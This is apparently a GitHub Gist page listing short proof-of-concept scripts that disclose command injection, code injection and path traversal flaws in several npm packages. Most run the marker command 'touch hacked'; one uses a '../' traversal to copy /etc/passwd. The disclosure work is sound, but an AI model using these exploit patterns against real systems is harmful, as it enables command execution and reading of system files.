Miguel Monteiro miguelafmonteiro
miguelafmonteiro
/ PoC.js
Last active
July 10, 2023 18:36
Affected versions of this package are vulnerable to Command Injection such that the package-exported function superchild() fails to sanitize its parameter commandLine, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once they control the commandLine content.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const superchild = require('superchild'); | |
| superchild("touch hacked", {"shell": true}) |
miguelafmonteiro
/ exec-chainable_poc.js
Created
July 17, 2023 20:01
Affected versions of this package are vulnerable to Command Injection such that the package-exported function execChainable (index.js) fails to sanitize its parameter command, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands..
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const execchainable = require('exec-chainable'); | |
| execchainable("touch hacked"); |
miguelafmonteiro
/ node-seq-exec_poc.js
Created
July 17, 2023 20:09
Affected versions of this package are vulnerable to Command Injection as the attacker controlled parameter command (index.js#L26) flows into a sensitive command execution API exec (index.js#L7). As a result, attackers may inject malicious commands.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const nodeseqexec = require('node-seq-exec'); | |
| nodeseqexec(["touch hacked"], () => {}); |
miguelafmonteiro
/ promised-exec_poc.js
Created
July 17, 2023 20:13
Affected versions of this package are vulnerable to Command Injection as the attacker controlled parameter command (index.js#L14) flows into a sensitive command execution API exec (index.js#L28). As a result, attackers may inject malicious commands.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const promisedexec = require('promised-exec'); | |
| promisedexec("touch hacked") |
miguelafmonteiro
/ spawn-command_poc.js
Created
July 17, 2023 20:20
Affected versions of this package are vulnerable to Command Injection as the attacker controlled parameter command (spawn-command.js#L4) flows into a sensitive command execution API spawn (spawn-command.js#L16). As a result, attackers may inject malicious commands.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const spawncommand = require('spawn-command'); | |
| spawncommand("touch hacked", {}) |
miguelafmonteiro
/ pwd-fs_poc.js
Created
July 17, 2023 20:27
Affected versions of this package are vulnerable to Path Traversal as the attacker controlled parameter src (recurse-io.js#L74) flows into a sensitive file system API createReadStream (recurse-io.js#L113). As a result, attackers may read sensitive content they are not supposed such as /etc/passwd..
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // must have a directory named dir/ in the same directory as poc.js | |
| const PoweredFileSystem = require('pwd-fs'); | |
| const pfs = new PoweredFileSystem(); | |
| pfs.copy("../../../../../../../../../../etc/passwd", "./dir") |
miguelafmonteiro
/ shelljs.exec_poc.js
Created
July 17, 2023 20:31
Affected versions of this package are vulnerable to Command Injection as the attacker controlled parameter command (index.js#L6) flows into a sensitive command execution API execSync (index.js#L14). As a result, attackers may inject malicious commands.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const exec = require("shelljs.exec"); | |
| exec("touch hacked", {}) |
miguelafmonteiro
/ eval-expression_poc.js
Created
July 17, 2023 20:35
Affected versions of this package are vulnerable to Code Injection as the attacker controlled parameter code (index.js#L1) flows into a sensitive code execution API eval (index.js#L2). As a result, attackers may inject malicious code.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const evalexp = require("eval-expression"); | |
| console.log(evalexp("2+2")) |
miguelafmonteiro
/ spawn-default-shell_poc.js
Created
July 17, 2023 20:39
Affected versions of this package are vulnerable to Command Injection as the attacker controlled parameter command (index.js#L4) flows into a sensitive command execution API spawn (index.js#L8). As a result, attackers may inject malicious commands.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const shell = require('spawn-default-shell'); | |
| shell.spawn("touch hacked", {}) |
miguelafmonteiro
/ exec-spawn_poc.js
Created
July 17, 2023 20:44
Affected versions of this package are vulnerable to Command Injection as the attacker controlled parameter command (index.js#L13) flows into a sensitive command execution API spawn (index.js#L46). As a result, attackers may inject malicious commands.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const execspawn = require('exec-spawn'); | |
| execspawn("touch", ["hacked"], {}, () => {}); |
OlderNewer